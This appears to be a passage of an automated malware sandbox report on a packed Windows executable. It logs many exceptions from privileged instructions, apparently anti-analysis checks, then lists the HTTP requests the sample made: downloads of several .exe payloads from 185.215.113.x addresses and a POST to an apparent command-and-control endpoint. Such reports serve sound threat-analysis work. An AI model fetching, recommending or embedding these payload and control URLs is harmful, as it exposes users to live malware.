__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 68 8d 12 19 48 89 34 24 e9 c7 fb ff ff 68 9d exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6e81a exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 452634 exception.address: 0x92e81a registers.esp: 2685912 registers.edi: 1968898280 registers.eax: 27932 registers.ebp: 3999641620 registers.edx: 0 registers.ebx: 1259 registers.esi: 9628590 registers.ecx: 583485246	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 2c 24 e9 fd fb ff ff c1 e1 08 81 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e7c1e exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 1997854 exception.address: 0xaa7c1e registers.esp: 2685912 registers.edi: 0 registers.eax: 27905 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 2031647 registers.esi: 11173312 registers.ecx: 146665	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb bb b5 51 7d 3f f7 d3 43 52 e9 7c 01 00 00 58 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e8cb4 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2002100 exception.address: 0xaa8cb4 registers.esp: 2685912 registers.edi: 11204764 registers.eax: 28067 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 2031647 registers.esi: 11173312 registers.ecx: 1325798793	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 57 89 e7 81 c7 04 00 00 00 81 ef 04 00 00 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e91d7 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2003415 exception.address: 0xaa91d7 registers.esp: 2685912 registers.edi: 11179284 registers.eax: 28067 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 11173312 registers.ecx: 1549541099	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 53 89 14 24 51 68 43 4a e1 5b 59 81 c9 93 1c exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f1375 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2036597 exception.address: 0xab1375 registers.esp: 2685912 registers.edi: 4141225 registers.eax: 4294938564 registers.ebp: 3999641620 registers.edx: 1114345 registers.ebx: 11179310 registers.esi: 0 registers.ecx: 11240389	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 0c 24 54 59 83 ec exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f6247 exception.instruction: in eax, dx exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2056775 exception.address: 0xab6247 registers.esp: 2685904 registers.edi: 4141225 registers.eax: 1447909480 registers.ebp: 3999641620 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 11215821 registers.ecx: 20	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f5d17 exception.address: 0xab5d17 exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc000001d exception.offset: 2055447 registers.esp: 2685904 registers.edi: 4141225 registers.eax: 1 registers.ebp: 3999641620 registers.edx: 22104 registers.ebx: 0 registers.esi: 11215821 registers.ecx: 20	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 4d 2a 2d 12 01 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f80f8 exception.instruction: in eax, dx exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2064632 exception.address: 0xab80f8 registers.esp: 2685904 registers.edi: 4141225 registers.eax: 1447909480 registers.ebp: 3999641620 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 11215821 registers.ecx: 10	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 14 fa ff ff bd e9 7a ff 7f 56 be 7e 13 7b exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb5d7 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2078167 exception.address: 0xabb5d7 registers.esp: 2685908 registers.edi: 11251372 registers.eax: 30798 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 9666765 registers.esi: 10 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 29 c0 ff 34 38 8b 34 24 50 51 89 e1 e9 54 01 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb05c exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2076764 exception.address: 0xabb05c registers.esp: 2685912 registers.edi: 11282170 registers.eax: 30798 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 9666765 registers.esi: 10 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 1c 09 63 2c 89 04 24 51 b9 26 84 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb647 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2078279 exception.address: 0xabb647 registers.esp: 2685912 registers.edi: 11282170 registers.eax: 4294938964 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 9666765 registers.esi: 3001122912 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 f9 64 8f 05 00 00 00 00 66 81 d2 5a exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fba2e exception.instruction: int 1 exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000005 exception.offset: 2079278 exception.address: 0xabba2e registers.esp: 2685872 registers.edi: 0 registers.eax: 2685872 registers.ebp: 3999641620 registers.edx: 2474553436 registers.ebx: 11254571 registers.esi: 0 registers.ecx: 109257438	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 29 d2 ff 34 16 8b 1c 24 83 ec 04 89 04 24 53 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x202685 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2107013 exception.address: 0xac2685 registers.esp: 2685912 registers.edi: 11282170 registers.eax: 32110 registers.ebp: 3999641620 registers.edx: 654654 registers.ebx: 9666765 registers.esi: 11313933 registers.ecx: 11274075	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb b8 a6 ce dd 7f 51 e9 cc 01 00 00 33 04 24 31 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20266f exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2106991 exception.address: 0xac266f registers.esp: 2685912 registers.edi: 11282170 registers.eax: 32110 registers.ebp: 3999641620 registers.edx: 4294937768 registers.ebx: 1501522 registers.esi: 11313933 registers.ecx: 11274075	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 68 c5 6e 75 5e 89 1c 24 52 ba cb fb f5 7f exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20ce9b exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2150043 exception.address: 0xacce9b registers.esp: 2685912 registers.edi: 0 registers.eax: 28178 registers.ebp: 3999641620 registers.edx: 6 registers.ebx: 11325239 registers.esi: 2179369302 registers.ecx: 6	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 52 ba 2d 44 a7 7f e9 29 ff ff ff 58 89 4c 24 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d51c exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2151708 exception.address: 0xacd51c registers.esp: 2685908 registers.edi: 0 registers.eax: 30167 registers.ebp: 3999641620 registers.edx: 1757210391 registers.ebx: 1092411361 registers.esi: 11325730 registers.ecx: 618335616	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 51 81 ec 04 00 00 00 89 14 24 50 51 b9 00 c0 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d219 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2150937 exception.address: 0xacd219 registers.esp: 2685912 registers.edi: 0 registers.eax: 30167 registers.ebp: 3999641620 registers.edx: 1757210391 registers.ebx: 1092411361 registers.esi: 11355897 registers.ecx: 618335616	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 89 14 24 89 34 24 68 9b 6a df 5f e9 94 fe exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d4d7 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2151639 exception.address: 0xacd4d7 registers.esp: 2685912 registers.edi: 0 registers.eax: 4294940412 registers.ebp: 3999641620 registers.edx: 1757210391 registers.ebx: 1092411361 registers.esi: 11355897 registers.ecx: 773209448	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 55 51 e9 cc fe ff ff 29 d5 5a 87 2c 24 5c 89 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x215d0c exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2186508 exception.address: 0xad5d0c registers.esp: 2685900 registers.edi: 0 registers.eax: 30675 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 11359901 registers.esi: 11355897 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 2c 24 50 81 ec 04 00 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x215a64 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2185828 exception.address: 0xad5a64 registers.esp: 2685904 registers.edi: 1783979243 registers.eax: 30675 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 11362700 registers.esi: 0 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 06 01 00 00 05 3e c6 ed 7d e9 16 01 00 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x231eda exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2301658 exception.address: 0xaf1eda registers.esp: 2685872 registers.edi: 11508821 registers.eax: 32505 registers.ebp: 3999641620 registers.edx: 4294937856 registers.ebx: 116969 registers.esi: 11471859 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 53 89 e3 57 bf 04 00 00 00 01 fb e9 3a 03 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23364e exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2307662 exception.address: 0xaf364e registers.esp: 2685868 registers.edi: 11508821 registers.eax: 11481109 registers.ebp: 3999641620 registers.edx: 314538387 registers.ebx: 116969 registers.esi: 11471859 registers.ecx: 351671198	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 2c 24 e9 07 f8 ff ff 81 c7 13 03 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x233856 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2308182 exception.address: 0xaf3856 registers.esp: 2685872 registers.edi: 11508821 registers.eax: 11507378 registers.ebp: 3999641620 registers.edx: 314538387 registers.ebx: 116969 registers.esi: 11471859 registers.ecx: 351671198	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 53 c7 04 24 08 b5 c1 2b e9 c5 02 00 00 5c 89 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2335a5 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2307493 exception.address: 0xaf35a5 registers.esp: 2685872 registers.edi: 11508821 registers.eax: 11483946 registers.ebp: 3999641620 registers.edx: 604292945 registers.ebx: 116969 registers.esi: 0 registers.ecx: 351671198	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 55 bd 85 60 fc 7f e9 00 00 00 00 f7 d5 e9 e0 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x234021 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2310177 exception.address: 0xaf4021 registers.esp: 2685868 registers.edi: 11508821 registers.eax: 31281 registers.ebp: 3999641620 registers.edx: 11484333 registers.ebx: 1674979726 registers.esi: 0 registers.ecx: 351671198	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 52 e9 f9 fd ff ff be 7c a9 ab 6b 81 e6 54 d0 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x234674 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2311796 exception.address: 0xaf4674 registers.esp: 2685872 registers.edi: 11508821 registers.eax: 4294938620 registers.ebp: 3999641620 registers.edx: 11515614 registers.ebx: 2576714592 registers.esi: 0 registers.ecx: 351671198	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 c7 04 24 ff ad d5 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2356dc exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2315996 exception.address: 0xaf56dc registers.esp: 2685872 registers.edi: 11489332 registers.eax: 25930 registers.ebp: 3999641620 registers.edx: 11475356 registers.ebx: 2576714592 registers.esi: 11488628 registers.ecx: 11515776	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 52 c7 04 24 9c 1a b5 2a 89 0c 24 89 e1 e9 09 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x235b30 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2317104 exception.address: 0xaf5b30 registers.esp: 2685872 registers.edi: 0 registers.eax: 25930 registers.ebp: 3999641620 registers.edx: 763207053 registers.ebx: 2576714592 registers.esi: 11488628 registers.ecx: 11492404	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 1d f6 ff ff 5d 53 53 e9 26 fc ff ff 5e 29 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23697c exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2320764 exception.address: 0xaf697c registers.esp: 2685872 registers.edi: 0 registers.eax: 26965 registers.ebp: 3999641620 registers.edx: 0 registers.ebx: 11495883 registers.esi: 11488628 registers.ecx: 604277075	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 83 00 00 00 81 e7 f5 04 ff 7b 81 c7 cf 91 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23d705 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2348805 exception.address: 0xafd705 registers.esp: 2685872 registers.edi: 3999641620 registers.eax: 11548251 registers.ebp: 3999641620 registers.edx: 0 registers.ebx: 4008704126 registers.esi: 4017735134 registers.ecx: 11520126	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 e9 20 fa ff ff 83 ec 04 e9 82 f7 ff ff 09 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23d787 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2348935 exception.address: 0xafd787 registers.esp: 2685872 registers.edi: 3999641620 registers.eax: 11524763 registers.ebp: 3999641620 registers.edx: 0 registers.ebx: 4008704126 registers.esi: 24811 registers.ecx: 0	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 53 e9 b8 03 00 00 57 89 e7 81 c7 04 00 00 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x241094 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2363540 exception.address: 0xb01094 registers.esp: 2685868 registers.edi: 3999641620 registers.eax: 11538149 registers.ebp: 3999641620 registers.edx: 1977259021 registers.ebx: 4009080734 registers.esi: 4007008377 registers.ecx: 1988795303	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb b9 6a 99 8e 7b e9 4d f4 ff ff 81 f3 52 cf ad exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x241bab exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2366379 exception.address: 0xb01bab registers.esp: 2685872 registers.edi: 4294941040 registers.eax: 11567694 registers.ebp: 3999641620 registers.edx: 1977259021 registers.ebx: 4009080734 registers.esi: 4007008377 registers.ecx: 157417	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 68 cf c3 3d 51 89 3c 24 e9 5f 04 00 00 89 0c exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2428ae exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2369710 exception.address: 0xb028ae registers.esp: 2685872 registers.edi: 0 registers.eax: 30995 registers.ebp: 3999641620 registers.edx: 4211642308 registers.ebx: 123754902 registers.esi: 81129 registers.ecx: 11546922	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 e4 fe ff ff 81 f7 e7 2f 45 fb 81 e9 5f 02 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x248b22 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2394914 exception.address: 0xb08b22 registers.esp: 2685868 registers.edi: 0 registers.eax: 31585 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 11550625 registers.ecx: 11569659	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 bf 00 00 00 00 68 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x249570 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2397552 exception.address: 0xb09570 registers.esp: 2685872 registers.edi: 0 registers.eax: 31585 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 11550625 registers.ecx: 11601244	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 ce f6 ff ff 59 50 b8 08 22 46 2c 31 c1 58 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2494f9 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2397433 exception.address: 0xb094f9 registers.esp: 2685872 registers.edi: 0 registers.eax: 4294938880 registers.ebp: 3999641620 registers.edx: 3967899216 registers.ebx: 2147483650 registers.esi: 11550625 registers.ecx: 11601244	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 e9 6e 01 00 00 68 00 d7 7c 34 89 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x25a143 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2466115 exception.address: 0xb1a143 registers.esp: 2685872 registers.edi: 11669815 registers.eax: 30760 registers.ebp: 3999641620 registers.edx: 59728 registers.ebx: 11591993 registers.esi: 4294939288 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 51 50 e9 68 fb ff ff be 21 81 6b 72 81 e6 04 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26556f exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2512239 exception.address: 0xb2556f registers.esp: 2685868 registers.edi: 11673577 registers.eax: 25823 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 11684932 registers.esi: 4294939288 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 56 e9 1a fb ff ff 68 df e8 b7 75 89 3c 24 e9 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x265221 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2511393 exception.address: 0xb25221 registers.esp: 2685872 registers.edi: 11673577 registers.eax: 25823 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 11710755 registers.esi: 4294939288 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 7a fd ff ff 81 e9 d1 b0 f1 5d 29 d1 e9 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26578d exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2512781 exception.address: 0xb2578d registers.esp: 2685872 registers.edi: 4294944628 registers.eax: 25823 registers.ebp: 3999641620 registers.edx: 604292951 registers.ebx: 11710755 registers.esi: 4294939288 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 52 56 be 37 08 4e 5e ba 76 66 39 11 31 f2 5e exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26f897 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2554007 exception.address: 0xb2f897 registers.esp: 2685868 registers.edi: 7803 registers.eax: 26948 registers.ebp: 3999641620 registers.edx: 11 registers.ebx: 11727282 registers.esi: 4148652928 registers.ecx: 12	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb e9 df fb ff ff c1 e1 02 81 c1 da c1 df 7b 81 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26f952 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2554194 exception.address: 0xb2f952 registers.esp: 2685872 registers.edi: 0 registers.eax: 26948 registers.ebp: 3999641620 registers.edx: 11 registers.ebx: 11730610 registers.esi: 4148652928 registers.ecx: 322689	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 b8 b1 dd fb 77 83 c0 ff f7 d0 40 e9 9e 01 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x27362e exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2569774 exception.address: 0xb3362e registers.esp: 2685868 registers.edi: 0 registers.eax: 31460 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 11730610 registers.esi: 11743029 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 56 e9 40 02 00 00 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x273601 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2569729 exception.address: 0xb33601 registers.esp: 2685872 registers.edi: 590479976 registers.eax: 31460 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 11745941 registers.ecx: 2459238400	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 55 e9 9c 00 00 00 68 6c 44 e9 62 5f 81 e7 d5 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x283bd1 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2636753 exception.address: 0xb43bd1 registers.esp: 2685872 registers.edi: 7803 registers.eax: 11838610 registers.ebp: 3999641620 registers.edx: 2130566132 registers.ebx: 4294940828 registers.esi: 1995571212 registers.ecx: 604292946	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.16/mine/random.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.43/Zu7JuNko/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/fate/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/7967666176/13Z5sqy.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/7644806746/jonbDes.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/5666444957/tYrnx75.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/1975996902/up7d8Ym.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/7527271436/012Bdpb.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/5643377291/7fOMOTQ.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.75/files/6691015685/Bjkm5hE.exe

Performs some HTTP requests (10 events)

request	GET http://185.215.113.16/mine/random.exe
request	POST http://185.215.113.43/Zu7JuNko/index.php
request	GET http://185.215.113.75/files/fate/random.exe
request	GET http://185.215.113.75/files/7967666176/13Z5sqy.exe
request	GET http://185.215.113.75/files/7644806746/jonbDes.exe
